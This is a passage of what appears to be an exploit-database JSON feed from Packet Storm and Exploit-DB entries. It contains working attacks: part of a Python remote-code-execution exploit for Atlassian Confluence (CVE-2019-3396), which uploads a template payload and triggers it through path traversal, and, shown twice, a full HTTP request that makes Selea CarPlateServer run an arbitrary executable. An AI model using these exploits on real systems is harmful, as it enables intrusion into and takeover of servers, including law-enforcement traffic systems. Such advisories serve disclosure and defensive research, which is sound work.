file_link_element.has_attr(\"data-linked-resource-id\"): \nexit_log(log, \"failed to find data-linked-resource-id attribute (file ID) for uploaded file link\") \nself._file_id = file_link_element[\"data-linked-resource-id\"] \nlog.debug(f\"found file ID: {self._file_id}\") \n \n \ndef exploit_path_traversal(config): \n\"\"\" \nThis sends one request towards vulnerable server to either get local file content or directory listing. 
\n\"\"\" \nlog.debug(\"running path traversal exploit\") \n \nexploit = Exploit(config) \nexploit.path_traversal(config.remote_path) \n \n \ndef exploit_rce(config): \n\"\"\"This executes multiple steps to gain RCE. Requires a session token. \n \nSteps: \n1. find personal space key for the user \n2. find personal space ID and homepage ID for the user \n3. get CSRF token (generated per session) \n4. upload template file with Java code (involves two requests, first one is 302 redirection) \n5. use path traversal part of exploit to load and execute local template file \n6. profit \n\"\"\" \nlog.debug(\"running RCE exploit\") \n \nexploit = Exploit(config) \nexploit.find_personal_space_key() \nexploit.find_personal_space_id_and_homepage_id() \nexploit.get_csrf_token() \nexploit.upload_template() \npayload_location = exploit.generate_payload_location() \nexploit.path_traversal(payload_location, decode_output=True) \n \n \nif __name__ == \"__main__\": \n# parse arguments and load all configuration items \nscript_arguments = parse_arguments() \nlog = Configuration.get_logger(script_arguments.verbosity) \n \nconfiguration = Configuration(script_arguments) \n \n# printing banner \nif not configuration.script_arguments.skip_banner: \nprint_banner() \n \nif script_arguments.quiet: \nlog.disabled = True \n \nlog.debug(\"finished parsing CLI arguments\") \nlog.debug(\"configuration was loaded successfully\") \nlog.debug(\"starting exploit\") \n \n# disabling warning about trusting self sign certificate from python requests \nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) \n \n# run appropriate function depending on mode \nconfiguration.script_arguments.func(configuration) \n \nlog.debug(\"done!\") \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/161065/atlassiancwcm-inject.txt"}, {"lastseen": "2021-01-22T15:44:01", "description": "", "published": "2021-01-22T00:00:00", 
"type": "packetstorm", "title": "Selea CarPlateServer 4.0.1.6 Remote Program Execution", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-22T00:00:00", "id": "PACKETSTORM:161068", "href": "https://packetstormsecurity.com/files/161068/Selea-CarPlateServer-4.0.1.6-Remote-Program-Execution.html", "sourceData": "` \nSelea CarPlateServer (CPS) v4.0.1.6 Remote Program Execution \n \n \nVendor: Selea s.r.l. \nProduct web page: https://www.selea.com \nAffected version: 4.0.1.6(210120) \n4.013(201105) \n3.100(200225) \n3.005(191206) \n3.005(191112) \n \nSummary: Our CPS (Car Plate Server) software is an advanced solution that can \nbe installed on computers and servers and used as an operations centre. It can \ncreate sophisticated traffic control and road safety systems connecting to \nstationary, mobile or vehicle-installed ANPR systems. CPS allows to send alert \nnotifications directly to tablets or smartphones, it can receive and transfer \ndata through safe encrypted protocols (HTTPS and FTPS). CPS is an open solution \nthat offers full integration with main video surveillance software. Our CPS \nsoftware connects to the national operations centre and provides law enforcement \nauthorities with necessary tools to issue alerts. CPS is designed to guarantee \ncooperation among different law enforcement agencies. It allows to create a \nmulti-user environment that manages different hierarchy levels and the related \ndivision of competences. \n \nDesc: The server suffers from an arbitrary win32/64 binary executable execution \nwhen setting the NO_LIST_EXE_PATH variable to a program of choice. The command \nwill be executed if the proper trigger criteria are met. It can be exploited via CSRF \nor by navigating to the /cps/ endpoint from the camera IP and bypassing authentication, \ngaining the ability to modify the running configuration including changing the \npassword of admin and other users. 
\n \nTested on: Microsoft Windows 10 Enterprise \nSeleaCPSHttpServer/1.1 \n \n \nVulnerability discovered by Gjoko 'LiquidWorm' Krstic \n@zeroscience \n \n \nAdvisory ID: ZSL-2021-5622 \nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5622.php \n \n \n08.11.2020 \n \n-- \n \n \nPOST /config_request?ACTION=WRITE HTTP/1.1 \nHost: localhost:8080 \nConnection: keep-alive \nContent-Length: 6309 \nAuthorization: Basic ZmFrZTpmYWtl \nAccept: application/json, text/plain, */* \nLoginMode: angular \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Edg/87.0.664.75 \nAuthToken: 6d0c4568-5c17-11eb-ab5f-54e1ad89571a \ncontent-type: application/json \nOrigin: http://localhost:8080 \nSec-Fetch-Site: same-origin \nSec-Fetch-Mode: cors \nSec-Fetch-Dest: empty \nReferer: http://localhost:8080/ \nAccept-Encoding: gzip, deflate, br \nAccept-Language: en-US,en;q=0.9 \n \n \n{ \n\"ACTIONS\": { \n\"ANIA_LIST_DAYS_NUM\": \"15\", \n\"ANIA_LIST_PWD\": \"\", \n\"ANIA_LIST_USER\": \"{B64valuehereommited}\", \n\"BLACK_LIST_COUNTRY\": \"\", \n\"EXACT_MATCH\": \"false\", \n\"FUZZY_MATCH\": \"true\", \n\"MINISTEROTRASPORTI_LIST_DAYS_NUM\": \"15\", \n\"MINISTEROTRASPORTI_LIST_ENABLE_CHECK\": \"0,1\", \n\"MINISTEROTRASPORTI_LIST_GET_OWNERS\": \"false\", \n\"MINISTEROTRASPORTI_LIST_PWD\": \"\", \n\"MINISTEROTRASPORTI_LIST_SIGNAL_MISSING_CARPLATE\": \"false\", \n\"MINISTEROTRASPORTI_LIST_SIGNAL_MISSING_REVISION\": \"false\", \n\"MINISTEROTRASPORTI_LIST_USER\": \"\", \n\"MINISTEROTRASPORTI_LIST_USE_SELEA_SERVER\": \"false\", \n\"MINISTEROTRASPORTI_LIST_USE_VPN\": \"true\", \n\"MINISTEROTRASPORTI_LIST_VPN_PASSWORD\": \"\", \n\"MINISTEROTRASPORTI_LIST_VPN_USERNAME\": \"\", \n\"MINISTERO_LIST_DAYS_NUM\": \"24\", \n\"MINISTERO_LIST_PWD\": \"\", \n\"MINISTERO_LIST_USER\": \"\", \n\"NO_LIST_ENABLED\": \"true\", \n\"NO_LIST_ENABLE_EXE\": \"true\", \n\"NO_LIST_EXE_PATH\": \"C:/windows/system32/calc.exe\", 
\n\"NO_LIST_HTTP\": \"http://localhost:8080/$TRIGGER_EXE_VAR\", \n\"NO_LIST_HTTP_ENABLED\": \"false\", \n\"NO_LIST_SEND_TCP_ALARM\": \"\", \n\"PERMISSIVE_MATCH\": \"true\", \n\"WHITE_LIST_ALLOWED_COUNTRY_TYPE_INFO\": \"\" \n}, \n\"CAMERAINFO\": { \n\"BA__________\": { \n\"APPROACHING\": \"\", \n\"CustomCameraId\": \"\", \n\"CustomGateId\": \"\", \n\"DetectDesc\": \"ZSL\", \n\"DetectId\": \"\", \n\"Direction\": \"\", \n\"GPSLocation\": \"\", \n\"GateDesc\": \"3\", \n\"GateId\": \"\", \n\"LEAVING\": \"\", \n\"ZoneName\": \"\", \n\"setname\": \"false\", \n\"skip\": \"false\" \n} \n}, \n\"CONTEXT\": { \n\"BA__________\": { \n\"URL\": [ \n\"https://www.zeroscience.mk\" \n] \n} \n}, \n\"DBMS\": { \n\"DB_NAME\": \"\", \n\"DB_PASSWORD\": \"\", \n\"DB_SERVER\": \"\", \n\"DB_TYPE\": \"sqlite\", \n\"DB_USERNAME\": \"\", \n\"ENCRYPT_DB\": \"false\", \n\"SQLITE_MAX_MB_RAM_CACHE\": \"-1\" \n}, \n\"EMAIL\": { \n\"DEST\": \"\", \n\"FROM_EMAIL\": \"\", \n\"FROM_NAME\": \"\", \n\"LOG_USER_SEARCH\": \"false\", \n\"MIN_EMAIL_TIME\": \"5\", \n\"PASSWORD\": \"\", \n\"PORT\": \"25\", \n\"SEND_EMAIL_ON_TAMPER\": \"false\", \n\"SERVER\": \"\", \n\"SSL\": \"false\", \n\"USERNAME\": \"\", \n\"XOAUTH2\": \"false\" \n}, \n\"EMAIL-XOAUTH2\": { \n\"refresh_token\": \"\" \n}, \n\"EZ_CLIENTS\": { \n\"PASSWORD\": \"\", \n\"SLAVES\": \"\", \n\"USERNAME\": \"\", \n\"USE_CNTLM\": \"false\", \n\"WANT_CTX\": \"false\" \n}, \n\"EZ_CLIENT_SCNTT\": { \n\"CTX\": \"true\", \n\"HOST\": \"\", \n\"PASSWORD\": \"\", \n\"PORT\": \"443\", \n\"USERNAME\": \"\" \n}, \n\"FTPSYNC\": { \n\"DELETE_OLD_SYNC_DAYS\": \"7\", \n\"JSON_CONFIG\": \"eyJzZXJ2ZXJzX2NvbmZpZyI6IFtdfQ==\", \n\"SAVE_FTP_SEND_ERRORS\": \"true\" \n}, \n\"GLOBAL_HTTP_PROXY\": { \n\"CNTLM_ENABLED\": \"false\", \n\"EZ_ADDRESS\": \"cps.selea.com\", \n\"EZ_PORT\": \"8999\", \n\"HOST\": \"\", \n\"NON_PROXY_HOST\": \"localhost|^(10|127|169\\\\.254|172\\\\.1[6-9]|172\\\\.2[0-9]|172\\\\.3[0-1]|192\\\\.168)\\\\..+\", \n\"PASSWORD\": \"\", \n\"PORT\": \"\", 
\n\"PROXY_ENABLED\": \"true\", \n\"USERNAME\": \"\" \n}, \n\"HTTPS\": { \n\"CERTIFICATE\": \"\", \n\"ENABLE_HTTP2\": \"true\", \n\"GET_CERTIFICATE_FROM_SELEA\": \"false\", \n\"PRIVATE_KEY\": \"\", \n\"ROOT_CERTIFICATE\": \"\" \n}, \n\"MASTER_CPS\": { \n\"ENABLED\": \"true\", \n\"MASTERS\": \"\", \n\"PASSWORD\": \"\", \n\"USERNAME\": \"\" \n}, \n\"PROXY_TCP\": { \n\"ENABLED\": \"false\", \n\"USE_HTTP_PROXY\": \"false\" \n}, \n\"REMOTE_LIST\": { \n\"ADDRESS\": \"\", \n\"ENABLED\": \"false\", \n\"PASSWORD\": \"\", \n\"PORT\": \"\", \n\"USERNAME\": \"\" \n}, \n\"REPORT\": { \n\"STATS_AGGREGATE\": \"true\", \n\"STATS_ENABLED\": \"false\", \n\"STATS_FREQ\": \"MONTH\", \n\"STATS_PATH\": \"\", \n\"STATS_SELECTED\": \"\", \n\"STATS_WEEK_DAY\": \"Mon\" \n}, \n\"SCNTT\": { \n\"LIST_A1_DAYS_LIMIT\": \"0\", \n\"SCNTT_PASSWORD\": \"\", \n\"SCNTT_PRIV_KEY_FILENAME\": \"\", \n\"SCNTT_PUB_CERT\": \"\", \n\"SCNTT_SYSTEM_DESC\": \"\", \n\"SCNTT_SYSTEM_ID\": \"\", \n\"SCNTT_USERNAME\": \"\" \n}, \n\"SETTINGS\": { \n\"ALLOW_FLASH_NOTIFICATIONS\": \"true\", \n\"AUTO_UPDATE\": \"true\", \n\"BACKUP_AT_SPECIFIC_HOUR\": \"-1\", \n\"BACKUP_DB_PATH\": \"\", \n\"BACKUP_EVERY_HOURS\": \"0\", \n\"CARPLATE_DETAILS_ENABLED\": \"false\", \n\"CHECK_EXPIRING_CARPLATES\": \"false\", \n\"CHECK_EXPIRING_CARPLATES_DAYS\": \"7\", \n\"CHECK_FILENAME_SYNTAX\": \"true\", \n\"DB_DELETE_DAYS\": \"90\", \n\"DB_DELETE_ENABLE\": \"false\", \n\"DB_DELETE_LOG_DAYS\": \"7\", \n\"DB_DELETE_OCR_FILE\": \"90\", \n\"DB_STATS_DELETE_DAYS\": \"90\", \n\"DISABLE_WHITELIST_REMOTE_DB_CHECK\": \"false\", \n\"ENCRYPT_IMAGES\": \"false\", \n\"FREE_DISK_LIMIT\": \"1000\", \n\"FRIENDLY_NAME\": \"test\", \n\"FTP_CUSTOM_PORT_RANGE\": \"false\", \n\"FTP_DOWNLOAD_DISABLED\": \"true\", \n\"FTP_ENABLED\": \"true\", \n\"FTP_EXTERN_IP\": \"\", \n\"FTP_EXTERN_IP_AUTO\": \"false\", \n\"FTP_LIST_DIR_DISABLED\": \"true\", \n\"FTP_MAX_PORT\": \"0\", \n\"FTP_MIN_PORT\": \"0\", \n\"FTP_PORT\": \"21\", \n\"FTP_USERS\": \"\", \n\"FTP_USE_FTPS\": 
\"true\", \n\"HTTP2_PORT\": \"8081\", \n\"HTTP_PASSWORD\": \"CR_B_B64/emEEokEfjdQqWo5pfQtoTCA80va3gcU\", \n\"HTTP_PORT\": \"8080\", \n\"HTTP_USERNAME\": \"admin\", \n\"IGNORE_CONTEXT_FOR_UNREADFAKE\": \"false\", \n\"IGNORE_IF_NOT_SYNTAX_MATCH\": \"false\", \n\"MILESTONE_CONNECTIONS\": \"5\", \n\"MILESTONE_ENABLED\": \"true\", \n\"MILESTONE_ENABLE_ACTIVE_CONNECTION\": \"false\", \n\"MILESTONE_PORT\": \"5666\", \n\"MILESTON_REMOTE_IP\": \"\", \n\"MILESTON_REMOTE_PORT\": \"8080\", \n\"MIN_LOG_LEVEL\": \"0\", \n\"PERIODIC_BACKUP_CONFIG\": \"0\", \n\"REMOVE_BLACK_LIST_ON_EXPIRE\": \"true\", \n\"REMOVE_NON_ALARM_CARPLATE\": \"false\", \n\"REMOVE_WHITE_LIST_ON_EXPIRE\": \"true\", \n\"SAVE_GATEWAY_SEND_ERRORS\": \"true\", \n\"SAVE_GATEWAY_SEND_ERRORS_MAX_DAYS\": \"7\", \n\"SEND_EMAIL_ON_LOST_CONNECTION\": \"false\", \n\"SEND_EMAIL_ON_LOST_CONNECTION_MIN_TIME\": \"600\", \n\"SEND_EMAIL_ON_NO_PLATE_READ\": \"false\", \n\"SEND_EMAIL_ON_NO_PLATE_READ_MIN_TIME\": \"12\", \n\"SERVER_NTP_ON\": \"false\", \n\"SERVER_NTP_PORT\": \"123\", \n\"USE_HTTPS\": \"false\" \n}, \n\"VPNC\": { \n\"VPN_NET_NAME\": \"\" \n}, \n\"TCP_TEMPLATES\": [] \n} \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161068/ZSL-2021-5622.txt"}], "exploitdb": [{"lastseen": "2021-01-22T09:06:45", "description": "", "published": "2021-01-22T00:00:00", "type": "exploitdb", "title": "Selea CarPlateServer (CPS) 4.0.1.6 - Remote Program Execution", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-22T00:00:00", "id": "EDB-ID:49452", "href": "https://www.exploit-db.com/exploits/49452", "sourceData": "# Exploit Title: Selea CarPlateServer (CPS) 4.0.1.6 - Remote Program Execution\r\n# Date: 08.11.2020\r\n# Exploit Author: LiquidWorm\r\n# Vendor Homepage: https://www.selea.com\r\n\r\nSelea CarPlateServer (CPS) v4.0.1.6 Remote Program Execution\r\n\r\n\r\nVendor: Selea s.r.l.\r\nProduct web page: https://www.selea.com\r\nAffected version: 
4.0.1.6(210120)\r\n 4.013(201105)\r\n 3.100(200225)\r\n 3.005(191206)\r\n 3.005(191112)\r\n\r\nSummary: Our CPS (Car Plate Server) software is an advanced solution that can\r\nbe installed on computers and servers and used as an operations centre. It can\r\ncreate sophisticated traffic control and road safety systems connecting to\r\nstationary, mobile or vehicle-installed ANPR systems. CPS allows to send alert\r\nnotifications directly to tablets or smartphones, it can receive and transfer\r\ndata through safe encrypted protocols (HTTPS and FTPS). CPS is an open solution\r\nthat offers full integration with main video surveillance software. Our CPS\r\nsoftware connects to the national operations centre and provides law enforcement\r\nauthorities with necessary tools to issue alerts. CPS is designed to guarantee\r\ncooperation among different law enforcement agencies. It allows to create a\r\nmulti-user environment that manages different hierarchy levels and the related\r\ndivision of competences.\r\n\r\nDesc: The server suffers from an arbitrary win32/64 binary executable execution\r\nwhen setting the NO_LIST_EXE_PATH variable to a program of choice. The command\r\nwill be executed if proper trigger criteria is met. 
It can be exploited via CSRF\r\nor by navigating to /cps/ endpoint from the camera IP and bypass authentication\r\ngaining the ability to modify the running configuration including changing the\r\npassword of admin and other users.\r\n\r\nTested on: Microsoft Windows 10 Enterprise\r\n SeleaCPSHttpServer/1.1\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2021-5622\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5622.php\r\n\r\n\r\n08.11.2020\r\n\r\n--\r\n\r\n\r\nPOST /config_request?ACTION=WRITE HTTP/1.1\r\nHost: localhost:8080\r\nConnection: keep-alive\r\nContent-Length: 6309\r\nAuthorization: Basic ZmFrZTpmYWtl\r\nAccept: application/json, text/plain, */*\r\nLoginMode: angular\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Edg/87.0.664.75\r\nAuthToken: 6d0c4568-5c17-11eb-ab5f-54e1ad89571a\r\ncontent-type: application/json\r\nOrigin: http://localhost:8080\r\nSec-Fetch-Site: same-origin\r\nSec-Fetch-Mode: cors\r\nSec-Fetch-Dest: empty\r\nReferer: http://localhost:8080/\r\nAccept-Encoding: gzip, deflate, br\r\nAccept-Language: en-US,en;q=0.9\r\n\r\n\r\n{\r\n \"ACTIONS\": {\r\n \"ANIA_LIST_DAYS_NUM\": \"15\",\r\n \"ANIA_LIST_PWD\": \"\",\r\n \"ANIA_LIST_USER\": \"{B64valuehereommited}\",\r\n \"BLACK_LIST_COUNTRY\": \"\",\r\n \"EXACT_MATCH\": \"false\",\r\n \"FUZZY_MATCH\": \"true\",\r\n \"MINISTEROTRASPORTI_LIST_DAYS_NUM\": \"15\",\r\n \"MINISTEROTRASPORTI_LIST_ENABLE_CHECK\": \"0,1\",\r\n \"MINISTEROTRASPORTI_LIST_GET_OWNERS\": \"false\",\r\n \"MINISTEROTRASPORTI_LIST_PWD\": \"\",\r\n \"MINISTEROTRASPORTI_LIST_SIGNAL_MISSING_CARPLATE\": \"false\",\r\n \"MINISTEROTRASPORTI_LIST_SIGNAL_MISSING_REVISION\": \"false\",\r\n \"MINISTEROTRASPORTI_LIST_USER\": \"\",\r\n \"MINISTEROTRASPORTI_LIST_USE_SELEA_SERVER\": \"false\",\r\n \"MINISTEROTRASPORTI_LIST_USE_VPN\": \"true\",\r\n 
\"MINISTEROTRASPORTI_LIST_VPN_PASSWORD\": \"\",\r\n \"MINISTEROTRASPORTI_LIST_VPN_USERNAME\": \"\",\r\n \"MINISTERO_LIST_DAYS_NUM\": \"24\",\r\n \"MINISTERO_LIST_PWD\": \"\",\r\n \"MINISTERO_LIST_USER\": \"\",\r\n \"NO_LIST_ENABLED\": \"true\",\r\n \"NO_LIST_ENABLE_EXE\": \"true\",\r\n \"NO_LIST_EXE_PATH\": \"C:/windows/system32/calc.exe\",\r\n \"NO_LIST_HTTP\": \"http://localhost:8080/$TRIGGER_EXE_VAR\",\r\n \"NO_LIST_HTTP_ENABLED\": \"false\",\r\n \"NO_LIST_SEND_TCP_ALARM\": \"\",\r\n \"PERMISSIVE_MATCH\": \"true\",\r\n \"WHITE_LIST_ALLOWED_COUNTRY_TYPE_INFO\": \"\"\r\n },\r\n \"CAMERAINFO\": {\r\n \"BA__________\": {\r\n \"APPROACHING\": \"\",\r\n \"CustomCameraId\": \"\",\r\n \"CustomGateId\": \"\",\r\n \"DetectDesc\": \"ZSL\",\r\n \"DetectId\": \"\",\r\n \"Direction\": \"\",\r\n \"GPSLocation\": \"\",\r\n \"GateDesc\": \"3\",\r\n \"GateId\": \"\",\r\n \"LEAVING\": \"\",\r\n \"ZoneName\": \"\",\r\n \"setname\": \"false\",\r\n \"skip\": \"false\"\r\n }\r\n },\r\n \"CONTEXT\": {\r\n \"BA__________\": {\r\n \"URL\": [\r\n \"https://www.zeroscience.mk\"\r\n ]\r\n }\r\n },\r\n \"DBMS\": {\r\n \"DB_NAME\": \"\",\r\n \"DB_PASSWORD\": \"\",\r\n \"DB_SERVER\": \"\",\r\n \"DB_TYPE\": \"sqlite\",\r\n \"DB_USERNAME\": \"\",\r\n \"ENCRYPT_DB\": \"false\",\r\n \"SQLITE_MAX_MB_RAM_CACHE\": \"-1\"\r\n },\r\n \"EMAIL\": {\r\n \"DEST\": \"\",\r\n \"FROM_EMAIL\": \"\",\r\n \"FROM_NAME\": \"\",\r\n \"LOG_USER_SEARCH\": \"false\",\r\n \"MIN_EMAIL_TIME\": \"5\",\r\n \"PASSWORD\": \"\",\r\n \"PORT\": \"25\",\r\n \"SEND_EMAIL_ON_TAMPER\": \"false\",\r\n \"SERVER\": \"\",\r\n \"SSL\": \"false\",\r\n \"USERNAME\": \"\",\r\n \"XOAUTH2\": \"false\"\r\n },\r\n \"EMAIL-XOAUTH2\": {\r\n \"refresh_token\": \"\"\r\n },\r\n \"EZ_CLIENTS\": {\r\n \"PASSWORD\": \"\",\r\n \"SLAVES\": \"\",\r\n \"USERNAME\": \"\",\r\n \"USE_CNTLM\": \"false\",\r\n \"WANT_CTX\": \"false\"\r\n },\r\n \"EZ_CLIENT_SCNTT\": {\r\n \"CTX\": \"true\",\r\n \"HOST\": \"\",\r\n \"PASSWORD\": \"\",\r\n \"PORT\": \"443\",\r\n 
\"USERNAME\": \"\"\r\n },\r\n \"FTPSYNC\": {\r\n \"DELETE_OLD_SYNC_DAYS\": \"7\",\r\n \"JSON_CONFIG\": \"eyJzZXJ2ZXJzX2NvbmZpZyI6IFtdfQ==\",\r\n \"SAVE_FTP_SEND_ERRORS\": \"true\"\r\n },\r\n \"GLOBAL_HTTP_PROXY\": {\r\n \"CNTLM_ENABLED\": \"false\",\r\n \"EZ_ADDRESS\": \"cps.selea.com\",\r\n \"EZ_PORT\": \"8999\",\r\n \"HOST\": \"\",\r\n \"NON_PROXY_HOST\": \"localhost|^(10|127|169\\\\.254|172\\\\.1[6-9]|172\\\\.2[0-9]|172\\\\.3[0-1]|192\\\\.168)\\\\..+\",\r\n \"PASSWORD\": \"\",\r\n \"PORT\": \"\",\r\n \"PROXY_ENABLED\": \"true\",\r\n \"USERNAME\": \"\"\r\n },\r\n \"HTTPS\": {\r\n \"CERTIFICATE\": \"\",\r\n \"ENABLE_HTTP2\": \"true\",\r\n \"GET_CERTIFICATE_FROM_SELEA\": \"false\",\r\n \"PRIVATE_KEY\": \"\",\r\n \"ROOT_CERTIFICATE\": \"\"\r\n },\r\n \"MASTER_CPS\": {\r\n \"ENABLED\": \"true\",\r\n \"MASTERS\": \"\",\r\n \"PASSWORD\": \"\",\r\n \"USERNAME\": \"\"\r\n },\r\n \"PROXY_TCP\": {\r\n \"ENABLED\": \"false\",\r\n \"USE_HTTP_PROXY\": \"false\"\r\n },\r\n \"REMOTE_LIST\": {\r\n \"ADDRESS\": \"\",\r\n \"ENABLED\": \"false\",\r\n \"PASSWORD\": \"\",\r\n \"PORT\": \"\",\r\n \"USERNAME\": \"\"\r\n },\r\n \"REPORT\": {\r\n \"STATS_AGGREGATE\": \"true\",\r\n \"STATS_ENABLED\": \"false\",\r\n \"STATS_FREQ\": \"MONTH\",\r\n \"STATS_PATH\": \"\",\r\n \"STATS_SELECTED\": \"\",\r\n \"STATS_WEEK_DAY\": \"Mon\"\r\n },\r\n \"SCNTT\": {\r\n \"LIST_A1_DAYS_LIMIT\": \"0\",\r\n \"SCNTT_PASSWORD\": \"\",\r\n \"SCNTT_PRIV_KEY_FILENAME\": \"\",\r\n \"SCNTT_PUB_CERT\": \"\",\r\n \"SCNTT_SYSTEM_DESC\": \"\",\r\n \"SCNTT_SYSTEM_ID\": \"\",\r\n \"SCNTT_USERNAME\": \"\"\r\n },\r\n \"SETTINGS\": {\r\n \"ALLOW_FLASH_NOTIFICATIONS\": \"true\",\r\n \"AUTO_UPDATE\": \"true\",\r\n \"BACKUP_AT_SPECIFIC_HOUR\": \"-1\",\r\n \"BACKUP_DB_PATH\": \"\",\r\n \"BACKUP_EVERY_HOURS\": \"0\",\r\n \"CARPLATE_DETAILS_ENABLED\": \"false\",\r\n \"CHECK_EXPIRING_CARPLATES\": \"false\",\r\n \"CHECK_EXPIRING_CARPLATES_DAYS\": \"7\",\r\n \"CHECK_FILENAME_SYNTAX\": \"true\",\r\n \"DB_DELETE_DAYS\": \"90\",\r\n 
\"DB_DELETE_ENABLE\": \"false\",\r\n \"DB_DELETE_LOG_DAYS\": \"7\",\r\n \"DB_DELETE_OCR_FILE\": \"90\",\r\n \"DB_STATS_DELETE_DAYS\": \"90\",\r\n \"DISABLE_WHITELIST_REMOTE_DB_CHECK\": \"false\",\r\n \"ENCRYPT_IMAGES\": \"false\",\r\n \"FREE_DISK_LIMIT\": \"1000\",\r\n \"FRIENDLY_NAME\": \"test\",\r\n \"FTP_CUSTOM_PORT_RANGE\": \"false\",\r\n \"FTP_DOWNLOAD_DISABLED\": \"true\",\r\n \"FTP_ENABLED\": \"true\",\r\n \"FTP_EXTERN_IP\": \"\",\r\n \"FTP_EXTERN_IP_AUTO\": \"false\",\r\n \"FTP_LIST_DIR_DISABLED\": \"true\",\r\n \"FTP_MAX_PORT\": \"0\",\r\n \"FTP_MIN_PORT\": \"0\",\r\n \"FTP_PORT\": \"21\",\r\n \"FTP_USERS\": \"\",\r\n \"FTP_USE_FTPS\": \"true\",\r\n \"HTTP2_PORT\": \"8081\",\r\n \"HTTP_PASSWORD\": \"CR_B_B64/emEEokEfjdQqWo5pfQtoTCA80va3gcU\",\r\n \"HTTP_PORT\": \"8080\",\r\n \"HTTP_USERNAME\": \"admin\",\r\n \"IGNORE_CONTEXT_FOR_UNREADFAKE\": \"false\",\r\n \"IGNORE_IF_NOT_SYNTAX_MATCH\": \"false\",\r\n \"MILESTONE_CONNECTIONS\": \"5\",\r\n \"MILESTONE_ENABLED\": \"true\",\r\n \"MILESTONE_ENABLE_ACTIVE_CONNECTION\": \"false\",\r\n \"MILESTONE_PORT\": \"5666\",\r\n \"MILESTON_REMOTE_IP\": \"\",\r\n \"MILESTON_REMOTE_PORT\": \"8080\",\r\n \"MIN_LOG_LEVEL\": \"0\",\r\n \"PERIODIC_BACKUP_CONFIG\": \"0\",\r\n \"REMOVE_BLACK_LIST_ON_EXPIRE\": \"true\",\r\n \"REMOVE_NON_ALARM_CARPLATE\": \"false\",\r\n \"REMOVE_WHITE_LIST_ON_EXPIRE\": \"true\",\r\n \"SAVE_GATEWAY_SEND_ERRORS\": \"true\",\r\n \"SAVE_GATEWAY_SEND_ERRORS_MAX_DAYS\": \"7\",\r\n \"SEND_EMAIL_ON_LOST_CONNECTION\": \"false\",\r\n \"SEND_EMAIL_ON_LOST_CONNECTION_MIN_TIME\": \"600\",\r\n \"SEND_EMAIL_ON_NO_PLATE_READ\": \"false\",\r\n \"SEND_EMAIL_ON_NO_PLATE_READ_MIN_TIME\": \"12\",\r\n \"SERVER_NTP_ON\": \"false\",\r\n \"SERVER_NTP_PORT\": \"123\",\r\n \"USE_HTTPS\": \"false\"\r\n },\r\n \"VPNC\": {\r\n \"VPN_NET_NAME\": \"\"\r\n },\r\n \"TCP_TEMPLATES\": []\r\n}", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/49452"}, {"lastseen": "2021-01-22T13:11:44", 
"description": "", "published": "2021-01-22T00:00:00", "type": "exploitdb", "title": "Atlassian Confluence Widget Connector Macro - SSTI", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-3396"], "modified": "2021-01-22T00:00:00", "id": "EDB-ID:49465", "href": "https://www.exploit-db.com/exploits/49465", "sourceData": "# Exploit Title: Atlassian Confluence Widget Connector Macro - SSTI \r\n# Date: 21-Jan-2021\r\n# Exploit Author: 46o60\r\n# Vendor Homepage: https://www.atlassian.com/software/confluence\r\n# Software Link: https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin\r\n# Version: 6.12.1\r\n# Tested on: Ubuntu 20.04.1 LTS\r\n# CVE : CVE-2019-3396\r\n\r\n#!/usr/bin/env python3\r\n# -*- coding: UTF-8 -*-\r\n\"\"\"\r\n\r\nExploit for CVE-2019-3396 (https://www.cvedetails.com/cve/CVE-2019-3396/) Widget Connector macro in Atlassian\r\nConfluence Server server-side template injection.\r\n\r\nVulnerability information:\r\n Authors:\r\n Daniil Dmitriev - Discovering vulnerability\r\n Dmitry (rrock) Shchannikov - Metasploit module\r\n Exploit\r\n ExploitDB:\r\n https://www.exploit-db.com/exploits/46731\r\n Metasploit\r\n https://www.rapid7.com/db/modules/exploit/multi/http/confluence_widget_connector/\r\n exploit/multi/http/confluence_widget_connector\r\n\r\nWhile Metasploit module works perfectly fine it has a limitation that to gain RCE outbound FTP request is being made\r\nfrom the target Confluence server towards attacker's server where the Velocity template with the payload is being\r\nhosted. If this is not possible, for example, because network where the target Confluence server is located filters all\r\noutbound traffic, alternative approach is needed. This exploit, in addition to original exploit implements this\r\nalternative approach by first uploading the template to the server and then loading it with original vulnerability from\r\nlocal file system. 
The limitation is that to upload a file, a valid session is needed for a non-privileged user. Any\r\nuser can upload a file to the server by attaching the file to his \"personal space\".\r\n\r\nThere are two modes of the exploit:\r\n 1. Exploiting path traversal for file disclosure and directory listings.\r\n 2. RCE by uploading a template file with payload to the server.\r\n\r\nIn the case where the network is filtered and loading a remote template is not possible and also you do not have a low-privileged\r\nuser session, you can still exploit the '_template' parameter to browse the server file system by using the first mode\r\nof this exploit. Conveniently, the application returns file content as well as directory listing depending on what the path\r\nis pointing to. As in the original exploit, no authentication is needed for this mode.\r\n\r\nLimitations of path traversal exploit:\r\n- not possible to distinguish between non-existent path and lack of permissions\r\n- no distinction between files and directories in the output\r\n\r\nIf you have the ability to authenticate to the server and have enough privileges to upload files, use the second mode. A\r\nregular user probably has enough privileges for this since each user can have their own personal space where they\r\nshould be able to add attachments. This exploit automatically finds the personal space, or creates one if it does not\r\nexist, and uploads a file with the Velocity template payload. 
